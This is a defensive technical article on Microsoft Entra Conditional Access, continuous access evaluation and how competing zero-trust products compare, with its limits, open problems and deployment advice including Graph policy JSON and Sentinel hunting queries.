const result = evaluate({ user: 'alice@contoso.com', app: 'Office365 Exchange Online', location: { ip: '203.0.113.42', country: 'PT' }, device: { compliant: true, joinType: 'Entra' }, signInRisk: 'low', userRisk: 'none', satisfies(grant) { const mfa = ['mfa', 'authStrength:phishingResistantMfa']; return mfa.includes(grant) || grant === 'compliantDevice'; }, }); console.log(JSON.stringify(result, null, 2)); `}

Risk-based conditions require Entra ID P2 [@ms-id-protection-overview]. Without that licence, the signInRiskLevels and userRiskLevels arrays in a policy are ignored. The rest of the engine works the same.

6.4 The grants

Each policy declares a set of grants. The grants are additive within a policy (all required to satisfy the policy) but the block grant in any matching policy takes precedence over allow grants in any other policy. Here are the grants currently in the schema:

Grant	What it requires	Notes
`block`	Deny access.	Always wins against allow grants.
`mfa`	Any MFA method registered for the user.	The legacy generic-MFA grant; replaced in modern deployments by Authentication Strength.
`requireAuthenticationStrength`	A named bundle of acceptable methods.	The modern grant. Built-in strengths include phishing-resistant [@ms-auth-strengths].
`compliantDevice`	The device record has `isCompliant: true`.	Set by Intune or a third-party compliance partner.
`domainJoinedDevice`	Hybrid Azure AD joined device.	Requires Entra Connect on-prem trust.
`approvedApplication`	Use an approved client app.	A small allow-list of Microsoft mobile apps.
`compliantApplication`	An app under an Intune App Protection Policy.	Mobile app management.
`passwordChange`	User must change their password.	Used for password-leaked recovery.
`requireTermsOfUse`	User must accept a terms-of-use document.	Used for compliance and guest scenarios.

A named, ordered bundle of acceptable authentication methods that a CA grant can demand. The three built-in strengths are *MFA strength* (any registered second factor), *Passwordless MFA strength* (no password used), and *Phishing-resistant MFA strength* (FIDO2 security key, Windows Hello for Business or a platform credential, or multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the canonical modern grant for high-value access.

The Authentication Strength grant is where the phishing-resistance story lives in 2026. A policy that demands the phishing-resistant strength refuses to accept TOTP or SMS or push as the second factor. Only credentials with cryptographic binding to the device or hardware token will satisfy the grant. That class of credential, by construction, cannot be replayed by an adversary-in-the-middle phishing kit -- because the underlying WebAuthn ceremony is bound to the origin of the relying party.

6.5 The Windows-side handoff

PRT issuance is an interactive sign-in. It goes through CA like any other.

A long-lived refresh token issued to a Windows session at user sign-in to Entra-joined or hybrid-Entra-joined devices. The PRT is bound to the device's TPM where one is available, and it grants the user single sign-on to all CA-targeted apps from that Windows session. Issuance is subject to CA evaluation; if a CA policy demands compliant device, the device must already be marked `isCompliant` before the PRT is issued.

The compliance state lands on the device object as isCompliant. Intune (or a third-party MDM through Intune's compliance-partner API) writes that field after evaluating the device against a compliance policy: disk encrypted, OS patched, antivirus running, jailbreak detection clean, and so on. CA reads it on subsequent policy evaluations. If a policy requires compliantDevice and the device object says isCompliant: false, the grant is not satisfied.

The operational seam to on-prem Active Directory runs the other direction. Kerberos and NTLM against on-prem domain controllers never consult Entra. The Microsoft Learn CA overview is explicit: CA is a cloud control plane; on-prem authentication is outside its scope [@ms-ca-overview]. This is the limit Section 8 will name precisely.

6.6 CAE in session

The third plane. Wire format lives in two Microsoft Learn pages: the claims-challenge page [@ms-claims-challenge] and the app-resilience CAE page [@ms-app-resilience-cae].

A client opts in to CAE by advertising the cp1 capability via the xms_cc claim in token requests. In MSAL, that opt-in looks like WithClientCapabilities(new[] { "cp1" }) [@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page says it cleanly: "The only currently known value is cp1" [@ms-claims-challenge].

When the policy plane sees a critical event after the token was issued, the resource API responds to the next call with HTTP 401 Unauthorized and a WWW-Authenticate header of the shape:

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer authorization_uri="<entra-authorize-endpoint>", error="insufficient_claims", claims="<base64-encoded JSON>"

The claims value is a base64-encoded JSON object that the client passes verbatim to the token endpoint when acquiring a fresh token [@ms-claims-challenge][@ms-app-resilience-cae]. The IdP evaluates the embedded claims, runs CA again with the new context, and issues a new token (or refuses).

The HTTP wire format CAE uses to revoke a session mid-flight. A CAE-aware resource API returns `HTTP 401` with `WWW-Authenticate: Bearer error="insufficient_claims", claims=""`. The client replays the base64 blob to Entra; Entra re-runs CA with the new context; the client receives a fresh token or a definitive refusal. The wire format is documented at [@ms-claims-challenge] and demonstrated at [@ms-app-resilience-cae].

Note: The CAE-aware capability is signalled by the client, not by the token. The client advertises cp1 via xms_cc; the token's CAE-awareness shows up as its lifetime (up to 28 hours) and the resource API's willingness to issue a claims challenge. Folk knowledge that says "look for a cae claim in the JWT" is incorrect.

The Microsoft Learn CAE document enumerates five critical events: account disabled or deleted, password change or reset, MFA enabled by an administrator, administrator token revocation, and high user risk detected by ID Protection [@ms-cae-concept]. A parallel pathway, Conditional Access policy evaluation, propagates network-location and policy changes to CAE-aware resource providers on the same channel. For IP-location changes the latency is "instant"; for everything else the ceiling is up to 15 minutes [@ms-cae-concept].

sequenceDiagram participant C as Client app participant R as Resource API CAE aware participant E as Entra token issuer participant P as ID Protection Note over C: Client holds long-lived CAE token C->>R: GET messages with bearer token R->>R: Token still cryptographically valid P->>E: High user risk event for Alice E->>R: Push critical event Alice high risk C->>R: GET messages with bearer token again R->>C: 401 WWW-Authenticate insufficient_claims claims base64 C->>E: Token request with claims blob and cp1 capability E->>E: Re-run CA with new context E-->>C: New token or definitive refusal C->>R: Retry with new token

{` // Simplified MSAL.js-shaped pseudocode for CAE opt-in and challenge handling const ENTRA_AUTHORITY = ''; const EXCHANGE_ENDPOINT = ''; const MAIL_READ_SCOPE = '';

const msal = new PublicClientApplication({ auth: { clientId: '', authority: ENTRA_AUTHORITY }, });

async function callExchange() { let token = await msal.acquireTokenSilent({ scopes: [MAIL_READ_SCOPE], clientCapabilities: ['cp1'], // advertise CAE awareness });

let res = await fetch(EXCHANGE_ENDPOINT, { headers: { Authorization: 'Bearer ' + token.accessToken }, });

if (res.status === 401) { const header = res.headers.get('WWW-Authenticate') || ''; const m = /claims="([^"]+)"/.exec(header); if (m) { // Replay the embedded claims to acquire a fresh token token = await msal.acquireTokenSilent({ scopes: [MAIL_READ_SCOPE], claims: Buffer.from(m[1], 'base64').toString('utf8'), clientCapabilities: ['cp1'], }); res = await fetch(EXCHANGE_ENDPOINT, { headers: { Authorization: 'Bearer ' + token.accessToken }, }); } }

console.log('HTTP', res.status); }

callExchange(); `}

Key idea: CAE inverts the conventional trade-off: lengthen the token, shorten the revocation. The token can live 28 hours because revocation is an event, not a clock.

The chain is now visible. The signal plane scored Alice's Tuesday sign-in. The policy plane evaluated the policies. The token issuer issued an access token (CAE-aware because Outlook advertises cp1). Exchange Online accepted the token and returned mail. If, twelve minutes from now, Alice's account is flagged high risk because a different sign-in attempt fires leakedCredentials, the critical event will fire, Exchange will issue a claims challenge, and Outlook will either acquire a fresh token (passing the new CA evaluation) or surface the refusal to the user.

Six independent components co-decided on one access event. Microsoft is one vendor. The same problem has been solved differently by Google, Okta, AWS, Cloudflare, and Zscaler. The Microsoft answer is not the only correct answer.

7. How others do it

Microsoft chose to enforce at token issuance and claims challenge. Google chose to enforce at every HTTP request via a reverse proxy. AWS chose a decidable policy DSL. These are not minor variations; they are different answers to "where does the policy engine live in the data path?"

Both Microsoft's and Google's models scale. Neither is strictly better. The choice is a function of what the enterprise already runs.

Google BeyondCorp, IAP, Chrome Enterprise Premium

Google's Identity-Aware Proxy puts the policy engine in the data path. The documentation calls it bluntly: "IAP lets you establish a central authorization layer for applications accessed by HTTPS, so you can use an application-level access control model instead of relying on network-level firewalls" [@google-iap]. Every HTTP request to an IAP-protected app passes through the proxy. The proxy authenticates the user (via Google Account, Workforce Identity Federation, or Identity Platform), evaluates a Common Expression Language policy against the request context, and -- on allow -- forwards the request to the backend with signed identity headers.

The BeyondCorp Enterprise product (recently rebranded as Chrome Enterprise Premium) layers context-aware access on top: device posture, geographic location, time of day [@google-bce-overview]. The architecture matches the 2014 USENIX paper [@ward-beyer-2014-beyondcorp] and the 2016 production follow-up [@osborn-2016-beyondcorp].

The strength is per-request authorization: every HTTP call is its own decision point. The weakness, from the M365 perspective, is that IAP does not gate Microsoft 365 first-party API traffic. The Outlook client does not route through Google's IAP; it routes through Entra and Exchange Online. For Microsoft 365 workloads, IAP is complementary at best.

Okta Identity Engine and ThreatInsight

Okta's policy engine is closer to Microsoft's structurally: the identity provider is the policy engine, app sign-on policies live on the IdP, and the resource side relies on the IdP's token rather than a per-request proxy. The Okta Identity Engine documents the rule shape: "App sign-in policies define how a user must authenticate to gain access to an app. They verify ... group membership, the IP zone they're signing in from, risk level, and others" [@okta-sign-on-policies]. Every new app gets a default policy with a single catch-all rule that allows access with two factors.

Okta ThreatInsight is the IP-reputation feed. The documentation describes it operationally: "Okta ThreatInsight aggregates data about sign-in activity across the Okta customer base to analyze and detect potentially malicious IP addresses ... password spraying, credential stuffing, brute-force cryptographic attacks" [@okta-threatinsight]. The signal coverage is narrower than ID Protection: ThreatInsight is IP-centric, where ID Protection runs a multi-detection ML pipeline on tokens, sessions, behaviour, and credentials.

AWS IAM Identity Center and Verified Access

AWS splits the problem. IAM Identity Center handles workforce SSO and trusted identity propagation to AWS services [@aws-iam-identity-center]. AWS Verified Access handles per-request authorization for HTTPS-fronted apps -- the ZTNA piece. The Verified Access docs put it plainly: "Verified Access evaluates each application access request in real time" and "verifies the trustworthiness of users and devices against a set of security requirements" [@aws-verified-access].

The interesting bit is the policy language: Cedar. Cedar is a deliberately decidable language for authorization policy. "Decidable" here is a precise term: the safety question (will some policy edit, in some future edit chain, leak this right?) is answerable by a static analyser for any Cedar policy [@cedar-security].

Cedar's intentional non-Turing-completeness is the language-design hedge against the Harrison-Ruzzo-Ullman undecidability result the next section will name. The trade-off is expressiveness: Cedar cannot express arbitrary computational predicates, which is the price of being analysable [@cedar-security].

Cloudflare Access and Zscaler Private Access

Cloudflare Access is an edge proxy. Policies are deny-by-default, with four building blocks: Actions (Allow, Block, Bypass, Service Auth), Rule types (Include, Require, Exclude), Selectors, and Values [@cloudflare-access-policies]. The deny-by-default semantics are explicit: "Since Access is deny by default, users who do not match a Block policy will still be denied access unless they explicitly match an Allow policy" [@cloudflare-access-policies]. Cloudflare also ships a policy tester that lets administrators dry-run a policy against the existing user population [@cloudflare-access-policy-mgmt].

Zscaler Private Access is a broker-based ZTNA: the user connects to a Zscaler edge node, the broker establishes a connection to the private app, and "users never access the corporate network, and apps are never exposed to the public internet" [@zscaler-zpa]. Zscaler's own marketing surveys put the VPN-replacement framing in numbers: "91% of organizations are concerned that VPNs compromise their security" and "56% of organizations suffered one or more VPN-related attacks in 2023-2024" [@zscaler-zpa].

Architecturally, Cloudflare Access and ZPA both sit closer to BeyondCorp than to Microsoft CA: the policy engine is in the data path; the protected resource is fronted by the proxy rather than gated at token issuance.

OpenID Shared Signals Framework and CAEP

Not a competitor: the cross-vendor wire format for what Microsoft built into CAE. On 22 September 2025, the OpenID Foundation approved three Final Specifications: the Shared Signals Framework 1.0, the Continuous Access Evaluation Profile 1.0, and the Risk Incident Sharing and Coordination Profile 1.0 [@helpnet-2025-openid][@openid-caep-final]. CAEP defines five event types -- Session Revoked, Token Claims Change, Credential Change, Assurance Level Change, Device Compliance Change -- as the cross-vendor revocation vocabulary.

Microsoft's CAE implementation is, in Microsoft's own words, "an industry standard based on Open ID Continuous Access Evaluation Profile" [@ms-cae-concept]. The Final Specifications from September 2025 are the canonical post-2025 reference; older drafts at OpenID's site are superseded.

Head-to-head comparison

The differences worth memorising:

System	Enforcement point	Native risk feed	Post-issuance revocation	Gates M365 first-party?	Best suited for
Microsoft Entra CA + ID Protection + CAE	Token issuer + CAE-aware resource APIs	ID Protection ML pipeline	CAE up to 15 min, instant for IP	Yes	M365 tenants
Google IAP / Chrome Enterprise Premium	HTTPS reverse proxy	Context-aware access signals	Per-request (always re-decides)	No	Google Cloud workloads
Okta Identity Engine + ThreatInsight	IdP token issuance	ThreatInsight IP feed	Limited, IdP-dependent	No	Vendor-neutral front door
AWS IAM Identity Center + Verified Access	Verified Access proxy + IAM	Trust providers (third-party)	Per-request for Verified Access	No	AWS-hosted apps
Cloudflare Access	Edge proxy	Risk score + identity factors	Per-request	No	Public web apps
Zscaler Private Access	Broker / edge node	Posture + identity	Per-request	No	Private app access

Per-cell sourcing for the table: the Microsoft row's "Yes" cell on M365 first-party gating is the directly-stated claim from the Microsoft Learn CA overview [@ms-ca-overview]. The other rows' "No" cells are negative inferences drawn from each peer's own product documentation, none of which advertises Microsoft 365 first-party API gating: Google IAP gates HTTPS-fronted apps behind the proxy [@google-iap]; Cloudflare Access deny-by-default applies to the apps fronted by Cloudflare [@cloudflare-access-policies]; Verified Access "evaluates each application access request" for HTTPS apps behind AWS [@aws-verified-access]; Zscaler ZPA brokers private app access [@zscaler-zpa]; Okta sign-on policies gate apps wired into Okta's IdP [@okta-sign-on-policies]. The cell semantics are "does the system gate Outlook/Teams/SharePoint/Graph first-party traffic" and the answer is structurally No outside Microsoft.

flowchart LR subgraph TOK[Token issuance model Microsoft Okta] U1[User] --> AT[Acquire token] AT --> CA1[CA evaluator] CA1 --> IS[Issue token] IS --> R1[Resource API validates token] R1 -. CAE 401 .-> AT end subgraph PRX[Data path proxy model Google BeyondCorp AWS Verified Access Cloudflare Zscaler] U2[User] --> PXY[Proxy intercepts every request] PXY --> POL[Policy evaluator at the proxy] POL --> BCK[Backend application] end

The honest observation worth sitting with: none of the proxy systems gates M365 first-party API traffic. Outlook, Teams, SharePoint, and Microsoft Graph route through Entra. For those workloads, Entra remains the only effective policy plane. The proxy systems gate the apps that sit behind the proxy -- internal apps, partner-facing apps, custom workloads. That makes BeyondCorp, Okta, Cloudflare Access, and ZPA complementary to Entra CA in an M365 environment, not substitutes for it.

Six systems, six architectural choices. None of them wrong. But what do they all leave on the table?

8. What Conditional Access fundamentally cannot do

Section 7 cannot be the ending. There are at least five things Conditional Access -- and every peer in Section 7 -- cannot do. Some are engineering limits; some are theorems. Both classes are worth naming.

(a) On-prem authentication

CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra. There is no policy hook for the legacy Windows protocols. If a domain user signs in to a domain-joined workstation, authenticates to a file server, and accesses a share, no piece of that flow touches Conditional Access. The Microsoft Learn overview is explicit about the scope [@ms-ca-overview].

This is the operational seam between cloud identity and on-prem identity. State it plainly; do not soften.

Note: Conditional Access does not gate Kerberos or NTLM against on-prem domain controllers. If your threat model includes lateral movement after credential theft on the on-prem side, CA is not your defence. Layer in Defender for Identity, on-prem MFA gateways, or a privileged-access workstation architecture instead.

(b) Post-issuance token theft

Once a refresh token is exfiltrated -- whether via an adversary-in-the-middle phishing kit like Evilginx [@ms-aitm-phishing-blog], an infostealer that scrapes the token cache, or a malicious browser extension -- the pre-issuance CA evaluation is bypassed. The attacker has a bearer token. They can present it to the resource API directly. CAE-aware resource providers can revoke mid-session on the published critical-event list, but the latency ceiling is "up to 15 minutes" for non-IP events [@ms-cae-concept]. In fifteen minutes a competent attacker has done plenty.

The mitigation is device-bound credentials: Primary Refresh Tokens bound to TPM hardware, FIDO2 with hardware attestation, certificate-based authentication with hardware-protected keys [@ms-prt-concept]. A bearer token bound to a TPM is not exfiltratable in the same way; the wrapped key material never leaves the device.

(c) Consent-grant phishing

CA evaluates authentication, not authorization grants that a user makes to a malicious OAuth app. A user who clicks "Allow" on a permissions-consent prompt for an attacker-controlled app has performed an OAuth authorization, not a sign-in. The malicious app now has the user's delegated permissions for whatever scopes were granted. CA was not invoked because CA gates the user's sign-ins; it does not inspect the user's OAuth grants. Microsoft Defender for Cloud Apps documents the attack class as "risky OAuth apps" and ships investigation and remediation tooling on a separate plane from CA [@ms-illicit-consent-grant].

Admin consent settings, app governance policies, and explicit allow-listing of acceptable publishers live on that different plane. The policy admin who deploys CA needs to deploy app governance separately.

(d) Risk evaluation is probabilistic

Identity Protection produces a score, not a proof. A "high" risk level is a confidence; it is not the assertion "this sign-in is definitely an attack." No vendor in the Section 7 survey publishes precision or recall numbers for its risk engine. The operating point -- the threshold that maps a continuous score to discrete buckets -- is a trade-off that the vendor calibrates and the customer does not see.

This is a structural lower bound on any ML-driven risk plane, not a Microsoft-specific failure. Any classifier has false positives and false negatives. A risk-aware CA policy that says "block at high risk" will, with non-zero probability, block a legitimate sign-in. A policy that says "require MFA at medium risk" will, with non-zero probability, let through a sophisticated attacker whose detections fall under the threshold.

(e) Workload-identity CA is constrained by design

Block-only grants. No managed identities. No group assignments. The full human grant taxonomy does not transfer because a service principal cannot perform an MFA challenge, cannot register a FIDO2 key, cannot accept a terms-of-use document. The Microsoft Learn page on workload-identity CA enumerates the constraints precisely [@ms-workload-identity-ca]. Section 9 will name this as an open problem; for now, treat it as a documented limit.

The theorems behind the limits

Some of these limits are engineering choices that could be different in a future product. Some are deeper.

Saltzer and Schroeder 1975 [@saltzer-schroeder-1975] give the upper bound on aspirations: complete mediation across every authentication and authorization decision within scope of mediation. The principle does not constrain what is in scope. It constrains what you must do for whatever you have decided is in scope. On-prem AD is out of scope for CA by Microsoft's product decision; complete mediation cannot fix that, because the principle is about consistency within the boundary, not about expanding the boundary.

Harrison-Ruzzo-Ullman 1976 -- usually shortened to HRU [@harrison-ruzzo-ullman-1976] -- gives the lower bound on static analysis. The safety question in the general access-matrix model is undecidable. In informal terms: there is no general algorithm that proves a Conditional Access policy edit cannot, under some future edit chain, leak a sensitive right. This is why every vendor in the survey relies on evaluation-time mediation (the engine decides at the moment of the request) rather than static-proof analysis (the engine certifies in advance that no edit can ever leak). Cedar's intentional restriction to a decidable fragment, in AWS Verified Access, is the counter-strategy: trade expressiveness for analysability.

The bearer-token revocation trade-off is informal but real: the worst-case revocation latency is bounded below by the token's natural lifetime, unless a side channel exists. CAE is that side channel. Its latency is bounded by the propagation time of the channel (up to 15 minutes for non-IP events, instant for IP). Shorten the channel further and you discover that the IdP-to-resource-API event delivery has its own infrastructure costs.

The practical implication of HRU for a CA admin is that there is no tool, anywhere, that can examine your tenant's CA policies and certify that no sequence of policy edits could ever leak access to a sensitive resource. Vendors offer policy *testers* that simulate a single edit against the current population; that is decidable. The question "is the system safe under all possible future edits?" is not. This is why audit trails, change-control gates, and least-privilege role assignments on the CA admin role matter as much as the CA policies themselves.

Naming the limits clears the way to name the active unsolved problems -- the ones the field is still working on, where the current state of the art admits it is partial.

9. Where the policy plane is still incomplete

Microsoft's own 2026 documentation for Conditional Access on AI agents calls the current implementation "a lightweight enforcement mechanism designed to block unauthorized or risky agents, not a full policy suite." That is not marketing modesty. It is an admission that the most active frontier of policy enforcement -- agent identities -- is deliberately under-specified.

Five open problems sit on that frontier in 2026.

Organizations are expanding Zero Trust across more users, applications, and now a growing population of AI agent identities ... the Conditional Access Optimization Agent moves beyond static guidance to continuous, context-aware identity posture optimization. [@ms-techcom-ca-optimization-agent]

9.1 Agent identity policy semantics

What grants should exist for AI agents beyond block and allow? Useful candidate grants include: "read-but-not-move" for mail or files; "business-hours-only"; "any autonomous action requires a fresh sign-off from the on-behalf-of human." None of these exist as first-class CA grant types in 2026.

What does exist: CA targeting of agent identities -- the ability to match a policy on the agent identity rather than the human -- and the Conditional Access Optimization Agent, which gives administrators continuous recommendations on policy posture [@ms-techcom-ca-optimization-agent]. The targeting is there. The grant taxonomy is still mostly the human one, applied imperfectly.

9.2 Cross-vendor CAEP interop

The wire format was finalised in September 2025 [@helpnet-2025-openid][@openid-caep-final]. Production receiver coverage outside Microsoft Entra-internal resource providers is partial. Two large vendors agreeing on an event schema is necessary but not sufficient for cross-vendor revocation to work in practice; the receiving side needs to act on the events. The next eighteen months are the period in which CAEP either becomes the cross-vendor wire format for revocation, or it does not.

9.3 Workload-identity grant set

What richer expressions could exist for non-human identities? The current Microsoft Learn page lists workload-identity detections: investigationsThreatIntelligence, suspiciousSignins, adminConfirmedServicePrincipalCompromised, leakedCredentials, maliciousApplication, suspiciousApplication, anomalousServicePrincipalActivity, suspiciousAPITraffic [@ms-workload-identity-risk]. The detections exist; the grant taxonomy stops at block.

Candidate richer grants: "workload attestation" (the service principal proves it is running on attested infrastructure), "verifiable claim from a trusted attester" (a third party signs a statement about the workload), "step-up authorization for sensitive scopes" (a higher-privilege scope requires a separate per-request authorization step). None of these is generally available in 2026.

A non-human identity in Entra ID: a service principal, an application registration's owned service principal, or a managed identity in Azure. Workload identities authenticate via client secrets, client certificates, federated credentials, or (for managed identities) instance-metadata-service tokens. Conditional Access for workload identities currently applies only to single-tenant service principals registered in the tenant; it does not cover multi-tenant SaaS apps or managed identities [@ms-workload-identity-ca].

9.4 The break-glass paradox

Emergency-access accounts must be excluded from CA. If a CA misconfiguration locks out every admin, the break-glass account is the recovery path. But exclusion creates a high-value bypass: an attacker who compromises a break-glass account inherits its exclusion.

There is no clean answer. Microsoft's guidance is exclusion plus FIDO2 binding plus alerting: the break-glass accounts have hardware-bound FIDO2 keys (so they cannot be phished), they are excluded from all CA policies (so misconfiguration cannot lock them out), and every sign-in is alerted on (so misuse is detected within minutes) [@ms-emergency-access].

Run two break-glass accounts, not one. Store the FIDO2 keys in separate physical safes under separate custodians. Never use them for anything but a recovery exercise once per quarter; if they sign in unexpectedly, treat the alert as a P1 incident. The operational pattern accepts that you have a bypass and treats the bypass as the highest-value alert in the tenant [@ms-emergency-access].

9.5 The risk-engine transparency problem

No vendor in the Section 7 survey publishes model architecture, feature vector size, or per-detection precision and recall. Microsoft does not. Okta does not. Google does not. Defenders, auditors, and regulators must accept a black-box score.

This matters in three places. First, for incident response: when an "atypical travel" detection fires for an executive, the responder cannot see which features contributed and how strongly. Second, for compliance: an auditor asked to evidence the effectiveness of the control plane gets the operating output (3-tier risk levels) but not a quantitative evaluation. Third, for the risk-engine vendors themselves, who must respond to legitimate regulatory questions about model bias and operational reliability without revealing the architecture that attackers would use to evade detection.

The article does not predict a resolution. It names the gap.

The architecture is incomplete by admission. It is also actionable today. A competent tenant administrator can deploy a sensible baseline in an afternoon.

10. Using Conditional Access today

The architectural story ends; the operational story begins. Here is what a competent tenant looks like in 2026.

The licensing reality

Conditional Access is not a feature every Microsoft 365 tenant gets. It is a feature gated by SKU. The licensing tiers are:

Entra ID Free. Security Defaults only [@ms-security-defaults]. No Conditional Access policies. No risk-based conditions. No CA-driven CAE (the critical-event-evaluation subsystem -- for events like account disable, password reset, and high user risk -- still propagates to CAE-aware M365 services at the service layer regardless of SKU; see Section 6.6) [@ms-cae-concept].
Entra ID P1. Conditional Access is unlocked [@ms-ca-overview]. You can author policies with any of the non-risk conditions: users, apps, locations, devices, client app, platform. You can demand any of the non-risk grants.
Entra ID P2. Adds risk-based conditions. signInRiskLevels and userRiskLevels become usable [@ms-id-protection-overview]. ID Protection's full report pane (risky users, risky sign-ins, risk detections) is accessible. The legacy ID-Protection-side risk policies retire 1 October 2026 [@ms-id-protection-policies].
Workload Identities Premium. A separate SKU. Unlocks CA scoped to service principals [@ms-workload-identity-ca].

This corrects a premise discarded earlier: "Conditional Access is the policy plane every M365 tenant runs on" is not true. Many tenants run on Security Defaults. The "policy plane every tenant runs on" is the cloud sign-in pipeline; CA is the configurable richer layer that P1+ tenants opt into.

Start with the managed baselines

Microsoft-managed Conditional Access policies are the recommended starting point [@ms-managed-policies]. They auto-deploy in Report-only mode, run for at least 45 days while administrators review the impact in the Sign-in logs, and are auto-enabled with a 28-day pre-enablement notification unless administrators opt out [@ms-managed-policies]. The currently shipping baselines, per Microsoft Learn, include:

MFA for admins accessing Microsoft admin portals (the most-privileged roles).
MFA for users who already have per-user MFA enabled (a migration aid).
MFA and reauthentication for risky sign-ins (the P2 baseline).
Block legacy authentication.
Block access for high-risk users (P2-tier protection on the user-risk surface).
Block all high-risk agents accessing all resources (Preview, AI-agent surface).

The original announcement called for a 90-day report-only window [@weinert-2023-managed-policies][@helpnet-2023-microsoft-entra-policies]. The current default is 45 days [@ms-managed-policies]; the window shrank as Microsoft gained confidence that customers were not surprised by the auto-enablement.

Five custom policies on top of the baselines

Beyond the managed policies, every well-run tenant in operational experience runs five custom policies on top of the baselines [@ms-ca-policy-common]: block legacy authentication unconditionally [@ms-managed-policies]; require the phishing-resistant Authentication Strength for any user in a privileged role [@ms-auth-strengths]; require compliantDevice for admin centres, finance apps, and customer-data exports [@ms-intune-compliance-partners]; restrict privileged sign-ins to a named-location allow-list with block-or-step-up outside it [@ms-ca-network]; and, where Entra ID P2 is licensed, demand a sign-in-risk-based step-up (MFA at high risk, a passwordless or phishing-resistant method at medium risk) [@ms-id-protection-policies].

Note: 1. Block legacy authentication. 2. Phishing-resistant Authentication Strength for admin roles. 3. Require compliant device for sensitive applications. 4. Named-location restrictions for privileged roles. 5. Sign-in-risk-based step-up where Entra ID P2 is available.

Automation entry points (Microsoft Graph)

The Graph endpoints administrators care about:

GET /identity/conditionalAccess/policies -- list policies. POST to create, PATCH to update [@ms-graph-capolicy].
GET /identityProtection/riskDetections -- the per-detection log. Filterable by riskLevel, riskState, userPrincipalName, activityDateTime [@ms-graph-riskdetection].
GET /identityProtection/riskyUsers -- the per-user risk view.

A policy authored in code looks like this (truncated for readability):

{
  "displayName": "Require phishing-resistant for admins",
  "state": "enabledForReportingButNotEnforced",
  "conditions": {
    "users": { "includeRoles": ["62e90394-69f5-4237-9190-012177145e10"] },
    "applications": { "includeApplications": ["All"] }
  },
  "grantControls": {
    "operator": "OR",
    "authenticationStrength": { "id": "00000000-0000-0000-0000-000000000004" }
  }
}

The recommended deployment dance is enabledForReportingButNotEnforced first; let the Sign-in log show you the impact for a calibration window; promote to enabled only after the report-only data matches expectations [@ms-ca-report-only].

Audit-time visibility

Three surfaces matter:

Sign-in logs in the Entra portal show the per-sign-in evaluation, including which CA policies matched and which grants were satisfied.
Risk-detection log in Identity Protection (P2 only) shows the per-detection narrative: which riskEventType fired, with what additionalInfo, against which user.
The What-If tool simulates a policy evaluation for a hypothetical sign-in, before you enable a policy.

Detection engineering

For E5 tenants, the Sign-in logs and risk detections flow into Microsoft Sentinel (via the Microsoft Entra ID connector) or Defender XDR [@ms-sentinel-aad-connector]. A KQL skeleton for high-risk-with-CA-failure looks like:

SigninLogs
| where ResultType != 0
| join kind=inner (AADRiskDetections | where RiskLevel == "high") on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, ConditionalAccessStatus, RiskEventType, FailureReason

The aggregate scale figure is worth remembering: Microsoft processes "more than 100 trillion security signals" daily across all identity products [@ms-managed-policies]. The detection engineer is consuming a small slice that landed in their tenant.

Run the following in Microsoft Sentinel or the Entra advanced hunting blade to surface sign-ins that succeeded *despite* a high-confidence risk detection -- the most operationally interesting subset. The query is original to this article; the schema it targets is the canonical Microsoft Sentinel Entra ID connector tables `SigninLogs` and `AADRiskDetections` [@ms-sentinel-aad-connector], and the join-and-filter pattern follows the practice documented in Microsoft's Sentinel hunting guidance [@ms-sentinel-hunting].

let window = 7d;
SigninLogs
| where TimeGenerated > ago(window)
| where ResultType == 0
| where ConditionalAccessStatus == "success"
| join kind=inner (
    AADRiskDetections
    | where TimeGenerated > ago(window)
    | where RiskLevel == "high"
) on UserPrincipalName, CorrelationId
| project TimeGenerated, UserPrincipalName, IPAddress, AppDisplayName, RiskEventType, ConditionalAccessPolicies
| order by TimeGenerated desc

The expected count for a well-tuned tenant is small. Spikes warrant a P2 investigation.

Break-glass

Two emergency-access accounts. FIDO2-bound. Excluded from every CA policy. Stored as separate hardware tokens in separate safes. Every sign-in is wired to a P1 alert. Per Section 9.4 and Microsoft Learn's emergency-access guidance, this is the acknowledged operational compromise to the break-glass paradox [@ms-emergency-access].

A non-personal Entra ID administrator account excluded from Conditional Access and from MFA enforcement, used only when the primary identity infrastructure has failed. Best practice: at least two such accounts, with hardware FIDO2 keys stored separately, monitored by an unconditional alert on any sign-in.

The article has answered "who decided?" five times over: by signal, by policy, by token, by session, by operational pattern. One section remains: the misconceptions that keep recurring.

11. Misconceptions that recur

Every time these questions come up in practice, the same wrong answers come back. The corrections are worth memorising.

Only if you have Entra ID P1 or higher and have configured CA policies. Free SKU tenants run Security Defaults, which is a coarse tenant-wide on/off switch, not CA [@ms-security-defaults]. CA is unlocked at P1 [@ms-ca-overview]; risk-based conditions are unlocked at P2 [@ms-id-protection-overview]. The "every tenant runs on CA" framing you sometimes see in marketing material is incorrect. No. CA is a cloud control plane. Kerberos and NTLM against on-prem domain controllers do not consult Entra at all [@ms-ca-overview]. If your threat model includes on-prem lateral movement, layer in Defender for Identity and the standard on-prem hardening playbook. No. CAE is event-driven push from the policy plane to CAE-aware resource APIs. The Microsoft Learn CAE document gives the latency ceiling precisely: "the goal for critical event evaluation is for response to be near real time, but latency of up to 15 minutes might be observed because of event propagation time; however, IP locations policy enforcement is instant" [@ms-cae-concept]. There is no 30-second poll. The token can live up to 28 hours because the revocation is event-driven. No. Clients advertise CAE-readiness via the `cp1` client capability in token requests, specifically by adding `cp1` to the `xms_cc` claim mechanism (or by calling `WithClientCapabilities(new[] { "cp1" })` in MSAL) [@ms-claims-challenge][@ms-app-resilience-cae]. The Microsoft Learn claims-challenge page is explicit: "The only currently known value is `cp1`" [@ms-claims-challenge]. The CAE-aware token is recognisable by its long lifetime (up to 28 hours) and by the resource API's willingness to issue an `insufficient_claims` challenge, not by a Boolean claim. No. Third-party MDM compliance partners can write the device compliance state into Entra via Intune's compliance-partner API [@ms-intune-compliance-partners]. The CA grant reads `isCompliant` on the device object; it does not care which MDM wrote that value. Microsoft's preferred deployment is Intune, but the integration point is open by design. In 2023. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product reached GA in late November 2022, and the Conditional Access feature itself reached general availability later in 2023 [@ms-workload-identity-ca]. Any article asserting a 2025 GA date for workload-identity CA is incorrect. No. Every sign-in produces a Sign-in log entry; ID Protection emits a `riskDetection` only when at least one detector fires for that sign-in 